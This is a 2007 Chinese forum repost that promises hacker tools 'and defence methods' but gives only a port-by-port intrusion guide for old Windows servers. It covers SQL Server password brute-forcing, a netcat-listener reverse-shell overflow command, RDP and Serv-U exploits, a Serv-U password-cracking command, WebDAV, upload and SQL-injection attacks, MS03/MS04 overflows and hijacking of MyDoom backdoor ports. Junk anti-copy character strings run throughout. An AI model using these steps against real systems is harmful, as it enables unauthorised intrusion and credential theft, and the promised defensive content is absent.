|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 % v9 Q/ i1 M/ j7 V& z
: ?1 [4 K& Y0 t. z: }
" f) ?/ B( ~7 V8 F
1. 1433端口入侵
( W) ^2 m. H1 ?& I# ~9 f; I4 X8 {, U1 k/ X7 O) ^7 A/ a
scanport.exe 查有1433的机器
, F2 p4 `" V5 e/ w% ]
5 ^. \# R5 J. ^ o- S# Q SQLScanPass.exe 进行字典暴破(字典是关键)
! T6 T2 A2 |: N( m1 y( Y H
8 P# ^+ E2 h# t& b/ [7 l: e- r L& q 最后 SQLTools.exe入侵 & ~' Z( R( i9 q8 C$ a* X" Z. ]
+ j% M9 R( c' O/ n+ }% @0 l+ e, s
============================= : R$ D, ^) ~5 m P& q1 m
. v8 g! E5 J2 J0 t7 {8 F1 ~- U
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
: c4 ~& z9 g) D( D* @6 d9 f2 E0 K. m2 u- H: Y( ^; z
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 ! g. o' s( u1 U
5 A5 n M4 _8 b1 i% E/ }+ A! ~
(以上反向的,测试成功)
( r' c' B5 r$ Q) T% s! B$ `1 A v4 _3 I7 l
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
J R/ Y( y6 A d y+ A
2 o, J$ b* p- g 2. 4899端口入侵 ) W5 ~2 |8 ~7 k8 S7 p% V
% P* B+ P e8 o4 n( b6 ^ v 用4899过滤器.exe,扫描空口令的机器
% G4 N* H7 [0 n( }# ^
7 Y" ~6 c, ]8 w. E# D 3. 3899的入侵 0 e/ u+ Z! u, I$ m3 c. h$ [
# ~( [' ?- c# e4 n2 u2 w 对很早的机器,可以试试3389的溢出(win3389ex.exe) 9 ^+ A, p( O2 i; ]3 S0 q
0 F! P" g% _/ k 对2000的机器,可以试试字典暴破。(tscrack.exe)
: s) a; F% o+ ]2 h
* q; G2 N" i4 _' h0 }3 ? 4. 80入侵
5 O' u* x ^* D( ?0 `3 W9 e% ?! X. E/ M& n4 b; h. Y, p; S# Z
对sp3以前的机器,可以用webdav入侵; ) ]$ M6 L) T" ^
" E8 |$ V0 E% \0 L; k# w$ N# A9 W- ] 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
6 |; P( ]0 e, W
7 L. U% N3 P& m2 _7 y2 ?" u 可以利用SQL进行注入。(小榕的注入软件)。 ' _4 V4 ]9 @- g2 e+ |( d
0 C- b J0 W N/ Q 5. serv-u入侵(21端口)
" L# i) y% h: u! q% m
; ]. K; ]- u$ }' Q# i& Z; H2 ]: E 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 3 Q* L6 w0 Z4 s
5 N# P& C+ _/ m& t) A 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) , h# f; Y$ I2 [! d; `
+ u- P/ Q# I6 D3 L* r' {
====================================== ! Q* ~. e# X5 A" Q) v- k: R
) H, ^' v) v- q2 F% i 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) / W; n- {( s0 G! o
' l1 u; L- W4 F. } 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
+ M R* U2 F1 @) a% b 8 E. C* P, ?- I4 V# v
6. 554端口 : R% O* ?- s, Z
: B+ |, J( I4 d# ~) K3 p 用real554.exe入侵。 $ Y+ F; F; I, D
) z7 v+ U: U9 i' v 7. 6129端口 : I- n: v7 I# `7 } {2 L- U9 P, `
" ?4 J" v. a* U, n# h; u+ U9 m# X
用DameWare6129.exe入侵。
* G# z# W8 _& ^* z4 R+ Q$ M6 l- X5 D4 ^
8. 系统漏洞
/ w7 F7 N1 b$ ^, ^, _- P! y2 ]; y7 p+ l* ?
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
`; x+ [( W n$ Z7 u- Q$ i4 m; ]& X
进行溢出入侵。
: ~; ?" `7 _: s2 z- R t
/ l2 C* x8 \' c 9. 3127等端口
6 m3 |/ e& n) S* W: ?7 H" m6 v) f& _/ ?; Y h) z
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
$ A! b0 t I/ t6 _+ B1 j' S6 ~/ X4 Q2 G; Q
10. 其他入侵 : r' t4 k4 i8 {" `" y
5 f5 ^% G5 U. Z) p/ N' t
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。9 T( s9 x0 Z7 ~2 [6 f
) H' t& ]( o9 F6 h: e4 \
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
